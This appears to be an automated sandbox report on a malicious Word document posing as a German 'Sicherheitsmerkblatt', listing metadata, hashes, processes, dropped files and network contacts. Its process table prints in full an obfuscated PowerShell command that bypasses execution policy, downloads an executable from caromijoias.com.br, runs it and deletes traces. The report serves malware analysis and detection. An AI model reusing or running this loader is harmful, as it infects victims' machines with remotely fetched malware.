File name: | Sicherheitsmerkblatt 15.11.2018 474664696.doc |
Full analysis: | https://app.any.run/tasks/f931f375-b3d2-47c8-9ce1-d5ec70addf2b |
Verdict: | Malicious activity |
Analysis date: | November 15, 2018, 11:32:35 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 5.1, Name of Creating Application: Microsoft Office Word, Author: Dr. Winfried Ziegert, Number of Characters: 55066, Create Time/Date: Wed Nov 7 02:19:23 2018, Last Saved Time/Date: Wed Nov 7 02:19:23 2018, Security: 0, Keywords: autem, omnis, iste, Last Saved By: Dr. Winfried Ziegert, Revision Number: 985196, Subject: Sicherheitsmerkblatt N474664696, Template: Normal, Title: Sicherheitsmerkblatt N474664696, Total Editing Time: 01:00, Number of Words: 27533, Number of Pages: 92, Comments: Minima explicabo aut alias laboriosam maxime ipsam necessitatibus. |
MD5: | 0DB588C76CB4B0BA5C6467C53C69D86E |
SHA1: | F571940792608147FD87FCE9008C296D3B8C600A |
SHA256: | 78E9A294117A15BD922456559E1550E68E367B98357EC92309FBD10E2801AF55 |
SSDEEP: | 3072:aZSIDVIw8YZ4p2sCMQwwvKHHeNHCGjDS+3RUkN7Ywv9nHpgYZJX:oDmWZ+oSehLlRtNdt7 |
.doc | | | Microsoft Word document (33.9) |
---|
CompObjUserTypeLen: | 39 |
---|---|
CompObjUserType: | Microsoft Office Word 97-2003 Document |
Software: | Microsoft Office Word |
Author: | Dr. Winfried Ziegert |
Characters: | 55066 |
CreateDate: | 2018:11:07 02:19:23 |
ModifyDate: | 2018:11:07 02:19:23 |
Security: | None |
Keywords: | autem, omnis, iste |
LastModifiedBy: | Dr. Winfried Ziegert |
RevisionNumber: | 985196 |
Subject: | Sicherheitsmerkblatt N474664696 |
Template: | Normal |
Title: | Sicherheitsmerkblatt N474664696 |
TotalEditTime: | 1.0 minutes |
Words: | 27533 |
Pages: | 92 |
Comments: | Minima explicabo aut alias laboriosam maxime ipsam necessitatibus. |
Paragraphs: | 543 |
Bytes: | -2147483648 |
HiddenSlides: | -2147483648 |
Lines: | 3617 |
Notes: | -2147483648 |
Slides: | -2147483648 |
Company: | Stahr |
Manager: | Muharrem Schleich |
Category: | quaerat |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3088 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Sicherheitsmerkblatt 15.11.2018 474664696.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | explorer.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Exit code: 0 Version: 14.0.6024.1000 | ||||
3160 | C:\Users\admin\AppData\Local\Temp\yyzai3\jrxrhw.exe $fqjkjecc='s/flats';$yojnopw='h);';$iumedb='move-';$tcizceakk='ent/theme';$yiphae0='=($env:te';$gloyue='Scope Pr';$gzjviav='ut';$gggnewxip='-force;';$woeeavn='e(''';$jhuoo02='zai3'') -';$aeih=':temp';$igcoaurb='xe'',$pat';$jdmk6='ionPoli';$iqcy='https://';$utryso='th;Re';$aiv='ome/se';$iky='caromi';$dboscnli='ei/calc.e';$ayoefn='rse ';$ptey='($env';$tpgie='''hwhfhj';$fqpgs='Item ';$jouicl=' + ''\yy';$uoli='ss; $pa';$wdyu='cess $pa';$npiy00=' Start-';$ouepu='br/';$ignahpu='cy By';$ehcet='joia';$deyyya='Exec';$woza=';(New-O';$kbeiif='et-';$ydqechf='s.com.';$ywmihm='Pro';$uqwfjz='.Webcli';$pxltvqoqq='ent).Do';$imzooge='bject Sys';$iaqv='wnloadFil';$sao='mp+';$fixotbht='oce';$uais='/wp-cont';$wwhly='ns';$rgcom='recu';$pyo=''';S';$aozn='th';$giive='pass -';$upkxzksu='tem.Net';$yfbhekcu='ayu.exe'')';$iholryv07='$hj = ';$chfmu='''\sqy'; Invoke-Expression ($iholryv07+$tpgie+$pyo+$kbeiif+$deyyya+$gzjviav+$jdmk6+$ignahpu+$giive+$gloyue+$fixotbht+$uoli+$aozn+$yiphae0+$sao+$chfmu+$yfbhekcu+$woza+$imzooge+$upkxzksu+$uqwfjz+$pxltvqoqq+$iaqv+$woeeavn+$iqcy+$iky+$ehcet+$ydqechf+$ouepu+$uais+$tcizceakk+$fqjkjecc+$aiv+$wwhly+$dboscnli+$igcoaurb+$yojnopw+$npiy00+$ywmihm+$wdyu+$utryso+$iumedb+$fqpgs+$ptey+$aeih+$jouicl+$jhuoo02+$rgcom+$ayoefn+$gggnewxip); | C:\Users\admin\AppData\Local\Temp\yyzai3\jrxrhw.exe | WINWORD.EXE | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
1860 | "C:\Program Files\Google\Chrome\Application\chrome.exe" | C:\Program Files\Google\Chrome\Application\chrome.exe | explorer.exe | |
User: admin Company: Google Inc. Integrity Level: MEDIUM Description: Google Chrome Exit code: 3221225547 Version: 68.0.3440.106 | ||||
3128 | "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win32 --annotation=prod=Chrome --annotation=ver=68.0.3440.106 --initial-client-data=0x78,0x7c,0x80,0x74,0x84,0x6f5e00b0,0x6f5e00c0,0x6f5e00cc | C:\Program Files\Google\Chrome\Application\chrome.exe | — | chrome.exe |
User: admin Company: Google Inc. Integrity Level: MEDIUM Description: Google Chrome Exit code: 0 Version: 68.0.3440.106 | ||||
3024 | "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=1464 --on-initialized-event-handle=304 --parent-handle=308 /prefetch:6 | C:\Program Files\Google\Chrome\Application\chrome.exe | — | chrome.exe |
User: admin Company: Google Inc. Integrity Level: MEDIUM Description: Google Chrome Exit code: 0 Version: 68.0.3440.106 | ||||
3532 | "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=856,7202269835907851266,8639951235699914407,131072 --enable-features=PasswordImport --gpu-preferences=KAAAAAAAAACAAwBAAQAAAAAAAAAAAGAAEAAAAAAAAAAAAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAKAAAAEAAAAAAAAAAAAAAACwAAABAAAAAAAAAAAQAAAAoAAAAQAAAAAAAAAAEAAAALAAAA --service-request-channel-token=61211C335D14DCCCCF15FCF73FE56F94 --mojo-platform-channel-handle=900 --ignored=" --type=renderer " /prefetch:2 | C:\Program Files\Google\Chrome\Application\chrome.exe | — | chrome.exe |
User: admin Company: Google Inc. Integrity Level: LOW Description: Google Chrome Exit code: 0 Version: 68.0.3440.106 | ||||
116 | "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=856,7202269835907851266,8639951235699914407,131072 --enable-features=PasswordImport --service-pipe-token=22AD1478403A7F02CD03304658619984 --lang=en-US --instant-process --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=22AD1478403A7F02CD03304658619984 --renderer-client-id=5 --mojo-platform-channel-handle=1896 /prefetch:1 | C:\Program Files\Google\Chrome\Application\chrome.exe | — | chrome.exe |
User: admin Company: Google Inc. Integrity Level: LOW Description: Google Chrome Exit code: 0 Version: 68.0.3440.106 | ||||
3524 | "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=856,7202269835907851266,8639951235699914407,131072 --enable-features=PasswordImport --service-pipe-token=884BE6831F274E4CC4834516F35AC7CD --lang=en-US --extension-process --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=884BE6831F274E4CC4834516F35AC7CD --renderer-client-id=3 --mojo-platform-channel-handle=2012 /prefetch:1 | C:\Program Files\Google\Chrome\Application\chrome.exe | — | chrome.exe |
User: admin Company: Google Inc. Integrity Level: LOW Description: Google Chrome Exit code: 0 Version: 68.0.3440.106 | ||||
2416 | "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=856,7202269835907851266,8639951235699914407,131072 --enable-features=PasswordImport --disable-gpu-compositing --service-pipe-token=261B6B7DF571B56C1CF136F2E50F5290 --lang=en-US --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=261B6B7DF571B56C1CF136F2E50F5290 --renderer-client-id=6 --mojo-platform-channel-handle=3504 /prefetch:1 | C:\Program Files\Google\Chrome\Application\chrome.exe | — | chrome.exe |
User: admin Company: Google Inc. Integrity Level: LOW Description: Google Chrome Exit code: 0 Version: 68.0.3440.106 | ||||
2504 | "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=ppapi-broker --field-trial-handle=856,7202269835907851266,8639951235699914407,131072 --enable-features=PasswordImport --lang=en-US --device-scale-factor=1 --ppapi-antialiased-text-enabled=0 --ppapi-subpixel-rendering-setting=0 --service-request-channel-token=9B645F70DF4A45F871006078AF6214D4 --mojo-platform-channel-handle=3524 /prefetch:4 | C:\Program Files\Google\Chrome\Application\chrome.exe | — | chrome.exe |
User: admin Company: Google Inc. Integrity Level: MEDIUM Description: Google Chrome Exit code: 0 Version: 68.0.3440.106 |
PID | Process | Filename | Type | |
---|---|---|---|---|
3088 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR994D.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3088 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\yyzai3\DotNetTypes.format.ps1xml | xml | |
MD5:1AB2FD4B6749AD6831C86411FDCAFB48 | SHA256:98540086CFC986D7604FFDED977EF20944D1715BF8453809CE736C919CB6E1EF | |||
3088 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\yyzai3\Certificate.format.ps1xml | xml | |
MD5:C93A361112351B30E2C959E72789952D | SHA256:4379BD59C1328A6811584D424DF3DC193A5D607E2859D3AC1655B9124A5F100D | |||
3088 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$cherheitsmerkblatt 15.11.2018 474664696.doc | pgc | |
MD5:7398061FD73554740DC9A1B9D5BD937A | SHA256:87AC31BCECB91183FC1C2AAD4AABC954E2CCFD6A12E19780D23DA2EAE119AAC6 | |||
3088 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\yyzai3\Diagnostics.Format.ps1xml | text | |
MD5:FF6EEB8125B9265C5BA40AF9F7C6F6BC | SHA256:7D569C1155CFA9B7BB2BA225EE409A55C8B0E8217F3A7E05BAA39DA1BD7C4689 | |||
3088 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\yyzai3\CompiledComposition.Microsoft.PowerShell.GPowerShell.dll | executable | |
MD5:A84B6952AB6A297CCE6C085FA8AB06CB | SHA256:54E3F8199D5C749920A2826C63D7C5E7E86D94874ADDCFD5C9B430671031017D | |||
3088 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:256A3EF47ED32A3D3038855D49DF0319 | SHA256:151B56C71BC28DD4D752808CE3A9352E96D9FA381320511F87B327A8208F5DD0 | |||
3088 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\yyzai3\en-US\about_aliases.help.txt | text | |
MD5:DCCDE3D3FA7A378DAB091D3B78E393CB | SHA256:5DD570CAA907247BAC82B722B453619ADC88063C238B294154939481C134B140 | |||
3088 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\yyzai3\en-US\about_Comment_Based_Help.help.txt | text | |
MD5:8D7E5AD25683E71CD1DFE4949A754BC5 | SHA256:A653702F520D12525099F8C7FF70A92D812C3DD3965D2D4953C2FA6840916ECD | |||
3088 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\yyzai3\en-US\about_command_precedence.help.txt | text | |
MD5:9B204318B2747400638FE5028E376100 | SHA256:A79D0811C03FEB6129802426F53799CBA1A93C4BD204CE33E55BC180D3F0F132 |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
1860 | chrome.exe | 216.58.215.234:443 | translate.googleapis.com | Google Inc. | US | whitelisted |
3160 | jrxrhw.exe | 206.189.253.241:443 | caromijoias.com.br | — | US | suspicious |
1860 | chrome.exe | 172.217.168.36:443 | www.google.com | Google Inc. | US | whitelisted |
1860 | chrome.exe | 172.217.168.10:443 | safebrowsing.googleapis.com | Google Inc. | US | whitelisted |
1860 | chrome.exe | 172.217.168.3:443 | www.google.de | Google Inc. | US | whitelisted |
1860 | chrome.exe | 64.233.167.94:443 | ssl.gstatic.com | Google Inc. | US | whitelisted |
1860 | chrome.exe | 216.58.215.237:443 | accounts.google.com | Google Inc. | US | whitelisted |
1860 | chrome.exe | 172.217.168.46:443 | apis.google.com | Google Inc. | US | whitelisted |
1860 | chrome.exe | 216.58.215.227:443 | www.gstatic.com | Google Inc. | US | whitelisted |
Domain | IP | Reputation |
---|---|---|
caromijoias.com.br |
| suspicious |
www.google.de |
| whitelisted |
www.gstatic.com |
| whitelisted |
safebrowsing.googleapis.com |
| whitelisted |
accounts.google.com |
| shared |
clientservices.googleapis.com |
| whitelisted |
ssl.gstatic.com |
| whitelisted |
apis.google.com |
| whitelisted |
www.google.com |
| whitelisted |
translate.googleapis.com |
| whitelisted |